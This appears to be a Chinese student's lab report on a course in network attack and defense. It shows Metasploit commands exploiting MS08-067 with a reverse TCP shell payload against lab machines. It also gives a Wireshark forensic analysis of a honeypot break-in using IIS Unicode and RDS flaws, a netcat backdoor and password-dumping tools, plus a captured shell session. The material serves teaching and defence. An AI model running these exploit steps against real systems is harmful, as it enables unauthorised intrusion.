20232937文兆宇 2023-2024-2 《网络攻防实践》实践六报告

yaoxixixi

已于 2024-04-18 21:16:29 修改

阅读量1k

点赞数 29

文章标签：网络

于 2024-04-18 21:14:36 首次发布

本文链接：https://blog.csdn.net/qq_45739995/article/details/137931723

版权

本文详细描述了使用Metasploit进行Windows远程渗透攻击的实践过程，包括Metasploitwindowsattacker的使用、NT系统破解攻击的取证分析，以及团队之间的对抗演练。同时讨论了如何防止类似攻击并分享了实践中遇到的问题及其解决方案。

摘要由CSDN通过智能技术生成

20232937文兆宇 2023-2024-2 《网络攻防实践》实践六报告

1.实践内容

（1）动手实践Metasploit windows attacker

任务：使用metasploit软件进行windows远程渗透统计实验

具体任务内容：使用windows Attacker/BT4攻击机尝试对windows Metasploitable靶机上的MS08-067漏洞进行远程渗透攻击，获取目标主机的访问权

（2）取证分析实践：解码一次成功的NT系统破解攻击。

来自212.116.251.162的攻击者成功攻陷了一台由rfp部署的蜜罐主机172.16.1.106,(主机名为lab.wiretrip.net)，要求提取并分析攻击的全部过程。
攻击者使用了什么破解工具进行攻击
攻击者如何使用这个破解工具进入并控制了系统
攻击者获得系统访问权限后做了什么
我们如何防止这样的攻击
你觉得攻击者是否警觉了他的目标是一台蜜罐主机？如果是，为什么
（3）团队对抗实践：windows系统远程渗透攻击和分析。

攻方使用metasploit选择漏洞进行攻击，获得控制权。（要求写出攻击方的同学信息、使用漏洞、相关IP地址等）

防守方使用wireshark监听获得的网络数据包，分析攻击过程，获取相关信息。

2.实践过程

2.1动手实践Metasploit windows attacker

攻击机：winxpattacker(192.168.200.4)
靶机：win2server(192.168.200.14)
在攻击机里，开始-所有程序-渗透工具-metasploit3-cygwin shell
在这里插入图片描述输入命令msfconsole
接下来利用MS08-067漏洞

search ms08_067 
use windows/smb/ms08_067_netapi

在这里插入图片描述配置漏洞的参数

set payload generic/shell_reverse_tcp
set LHOST 192.168.200.4
set RHOST 192.168.200.14
show options

在这里插入图片描述
最后输入命令，攻击利用

exploit

在这里插入图片描述最后攻击成功

2.2取证分析实践：解码一次成功的NT系统破解攻击

先用wireshark打开流量文件
在这里插入图片描述已知目标主机的ip，发现关于目标主机有大量的http流，进行追踪

ip.dst ==172.16.1.106 and http

在这里插入图片描述在tcp流里发现了unicode字符串，猜测是Unicode攻击以打开boot.ini文件

继续往下寻找，发现了shell语句，查找资料后发现这是rds漏洞

根据shell语句以及视频资料
攻击者使用IIS Unicode漏洞进行攻击，利用msadcs.dll中的RDS漏洞允许任意代码执行的漏洞进行攻击
攻击者利用FTP的方式下载文件，dump.exe和samdump.dll是配合使用破解口令的，利用samdump.dll拿到口令后再用pdump.exe进行破解
nc.exe是一个后门
在这里插入图片描述
输入命令过滤流量文件

http.request.uri contains "msadc"

这里发现msadcs.dll已经上传成功了
在这里插入图片描述追踪ftp流，这里可以看见用户名和密码以及后续的后门操作
继续查看1233流量包，发现攻击者攻击了6969端口
在5766包里面，删除痕迹。
在下面的图里，攻击者已经发现了这是一个蜜罐
对于如何防止攻击，可以先修补RDS和Unicode漏洞，或者直接升级相应的服务到最新版本即可。

2.3团队对抗实践：windows系统远程渗透攻击和分析

攻击

攻击方：文兆宇 kali 192.168.43.68
防守方：WHY win2server 192.168.43.158
利用MS08-067漏洞
在这里插入图片描述

防守

攻击方：WHY kali 192.168.43.16
防守方：文兆宇 win2server 192.168.43.218
利用永恒之蓝漏洞
攻击方扫描
在这里插入图片描述流量包

Microsoft Windows 2000 [Version 5.00.2195]echo pre2n9i8tqY9J65h

(C) ........ 1985-1998 Microsoft Corp.

C:\WINNT\system32>echo pre2n9i8tqY9J65h
pre2n9i8tqY9J65h

C:\WINNT\system32>

C:\WINNT\system32>ipconfig/all
ipconfig/all


Windows 2000 IP Configuration



	Host Name . . . . . . . . . . . . : icst-win2k-s
	Primary DNS Suffix  . . . . . . . : 
	Node Type . . . . . . . . . . . . : Hybrid

	IP Routing Enabled. . . . . . . . : No

	WINS Proxy Enabled. . . . . . . . : No


Ethernet adapter ........:



	Connection-specific DNS Suffix  . : 
	Description . . . . . . . . . . . : VMware Accelerated AMD PCNet Adapter
	Physical Address. . . . . . . . . : 00-0C-29-50-6C-57

	DHCP Enabled. . . . . . . . . . . : Yes

	Autoconfiguration Enabled . . . . : Yes

	IP Address. . . . . . . . . . . . : 192.168.43.218

	Subnet Mask . . . . . . . . . . . : 255.255.255.0

	Default Gateway . . . . . . . . . : 192.168.43.1

	DHCP Server . . . . . . . . . . . : 192.168.43.1

	DNS Servers . . . . . . . . . . . : 192.168.43.1
	Lease Obtained. . . . . . . . . . : 2024..4..18.. 21:11:36

	Lease Expires . . . . . . . . . . : 2024..4..18.. 22:11:36


C:\WINNT\system32>